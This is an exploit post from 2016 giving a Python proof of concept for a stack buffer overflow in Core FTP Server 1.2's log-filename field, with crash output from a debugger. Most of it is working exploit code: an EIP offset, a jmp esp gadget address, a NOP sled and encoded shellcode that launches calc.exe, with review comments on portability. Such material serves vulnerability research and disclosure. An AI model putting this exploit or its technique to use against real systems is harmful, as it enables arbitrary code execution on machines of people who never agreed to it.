Core FTP Server 1.2 Buffer Overflow
Posted on 23 February 2016
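# -*- coding: utf-8 -*-
#
# Exploit Title : Core FTP Server v1.2 - BufferOverflow POC
# Date: 2016-02-22
# Author: INSECT.B
# Facebook : https://www.facebook.com/B.INSECT00
# GitHub : binsect00
# Blog : http://binsect00.tistory.com
# Vendor Homepage : http://www.coreftp.com/
# Software Link:
# Version: 1.2
# Tested on: Windows7 Professional SP1 En x86
# CVE : N/A
'''
[+] Type : Buffer overflow (stack-based; the saved return address is overwritten)
[+] Detail :
 [-] This is a textbook stack buffer overflow.
 [-] The overlong string is entered in the 'Log filename(include path)' field,
     reached via [setup] - [new] - [Logging options] - [More].
 [-] The 'Log filename(include path)' field has no length limit and the
     application does not check the length of what it receives.
 [-] Entering "A"*1500 and pressing Ok, OK crashes the process with EIP fully
     attacker-controlled (0x41414141).
 [-] crash info
(3bc.e28): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000111 ecx=41414141 edx=0012a3d9 esi=00502438 edi=00000001
eip=41414141 esp=00129bf0 ebp=00129bf8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
41414141 ?? ???
'''
import struct

# Number of filler bytes between the start of the field contents and the saved
# return address (the "A"*1500 crash above shows EIP is reached; 312 is the
# offset the author determined).
OFFSET_TO_EIP = 312

# Address of a `jmp esp` gadget on the tested Windows 7 SP1 x86 EN install:
#   USER32!gSharedInfo+0x181fb:
#   7795163b ffe4            jmp esp
# NOTE(review): this address is only valid for that exact user32.dll build and
# load address. System DLLs are subject to ASLR rebasing, so the gadget must be
# re-located for any other target (or boot) — it is what makes the PoC
# non-portable.
JMP_ESP = 0x7795163b

# Size of the NOP sled that `jmp esp` lands in before the shellcode.
NOP_SLED_LEN = 10

# windows/exec calc.exe (benign: pops the calculator), encoded with
# x86/alpha_mixed. The alpha_mixed output starts with a short non-alphanumeric
# GetPC stub; the remainder is printable. The published listing had lost the
# backslash of every "\x.." escape ("x89xe5..."), which would have produced the
# literal text rather than the bytes; the escapes are restored here.
SHELLCODE = (
    b"\x89\xe5\xdb\xde\xd9\x75\xf4\x59\x49\x49\x49\x49\x49\x49"
    b"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a"
    b"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41"
    b"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42"
    b"\x75\x4a\x49\x59\x6c\x68\x68\x6f\x72\x67\x70\x77\x70\x47"
    b"\x70\x75\x30\x6f\x79\x4a\x45\x44\x71\x49\x50\x30\x64\x6c"
    b"\x4b\x56\x30\x34\x70\x4e\x6b\x61\x42\x56\x6c\x6c\x4b\x71"
    b"\x42\x77\x64\x4c\x4b\x32\x52\x67\x58\x76\x6f\x6c\x77\x71"
    b"\x5a\x31\x36\x65\x61\x49\x6f\x4e\x4c\x67\x4c\x53\x51\x61"
    b"\x6c\x37\x72\x44\x6c\x47\x50\x4f\x31\x38\x4f\x54\x4d\x36"
    b"\x61\x58\x47\x58\x62\x69\x62\x46\x32\x51\x47\x6c\x4b\x61"
    b"\x42\x46\x70\x6c\x4b\x52\x6a\x75\x6c\x6e\x6b\x42\x6c\x34"
    b"\x51\x30\x78\x79\x73\x72\x68\x65\x51\x7a\x71\x30\x51\x6c"
    b"\x4b\x53\x69\x57\x50\x43\x31\x58\x53\x4c\x4b\x62\x69\x76"
    b"\x78\x58\x63\x75\x6a\x37\x39\x4c\x4b\x75\x64\x6c\x4b\x36"
    b"\x61\x4e\x36\x54\x71\x69\x6f\x6e\x4c\x5a\x61\x5a\x6f\x54"
    b"\x4d\x43\x31\x58\x47\x45\x68\x59\x70\x32\x55\x4b\x46\x64"
    b"\x43\x51\x6d\x58\x78\x45\x6b\x31\x6d\x55\x74\x50\x75\x48"
    b"\x64\x42\x78\x6c\x4b\x32\x78\x77\x54\x67\x71\x38\x53\x63"
    b"\x56\x4c\x4b\x66\x6c\x62\x6b\x6e\x6b\x52\x78\x35\x4c\x63"
    b"\x31\x68\x53\x6e\x6b\x45\x54\x4c\x4b\x46\x61\x5a\x70\x6c"
    b"\x49\x47\x34\x65\x74\x31\x34\x61\x4b\x31\x4b\x75\x31\x43"
    b"\x69\x52\x7a\x36\x31\x6b\x4f\x59\x70\x73\x6f\x63\x6f\x32"
    b"\x7a\x4c\x4b\x45\x42\x78\x6b\x6e\x6d\x43\x6d\x31\x7a\x63"
    b"\x31\x6c\x4d\x6c\x45\x4e\x52\x75\x50\x77\x70\x47\x70\x50"
    b"\x50\x63\x58\x66\x51\x4e\x6b\x62\x4f\x6b\x37\x6b\x4f\x7a"
    b"\x75\x6f\x4b\x4c\x30\x68\x35\x6f\x52\x61\x46\x43\x58\x69"
    b"\x36\x7a\x35\x4d\x6d\x4f\x6d\x69\x6f\x68\x55\x65\x6c\x56"
    b"\x66\x33\x4c\x37\x7a\x4d\x50\x49\x6b\x79\x70\x51\x65\x37"
    b"\x75\x4f\x4b\x31\x57\x75\x43\x61\x62\x70\x6f\x73\x5a\x73"
    b"\x30\x46\x33\x39\x6f\x6a\x75\x70\x63\x45\x31\x42\x4c\x63"
    b"\x53\x74\x6e\x71\x75\x31\x68\x73\x55\x57\x70\x41\x41"
)


def build_payload(offset=OFFSET_TO_EIP, jmp_esp=JMP_ESP, nop_len=NOP_SLED_LEN,
                  shellcode=SHELLCODE):
    """Return the overflow string: filler | jmp-esp address | NOP sled | shellcode.

    Everything is built as bytes so the result is identical on Python 2 and 3
    (the original mixed a str with struct.pack() output and wrote it in "wb"
    mode, which fails on Python 3).

    Args:
        offset: number of filler bytes before the saved return address.
        jmp_esp: address of a `jmp esp` gadget; packed little-endian as the
            x86 stack stores a return address.
        nop_len: length of the NOP sled placed where `jmp esp` lands.
        shellcode: the code executed once the sled is reached.

    Returns:
        The complete payload as bytes.
    """
    junk = b"A" * offset
    eip = struct.pack("<L", jmp_esp)  # 4-byte little-endian DWORD
    nop = b"\x90" * nop_len
    return junk + eip + nop + shellcode


def main():
    """Write the payload to CoreFTPServer_Ex.txt for pasting into the log-filename field."""
    payload = build_payload()
    # NOTE(review): the payload contains non-printable bytes (the packed
    # address and the 0x90 sled). Whether they survive a copy/paste through a
    # text editor into the GUI field is not shown here; an editor that mangles
    # them would break the PoC.
    with open("CoreFTPServer_Ex.txt", "wb") as f:
        f.write(payload)


if __name__ == "__main__":
    main()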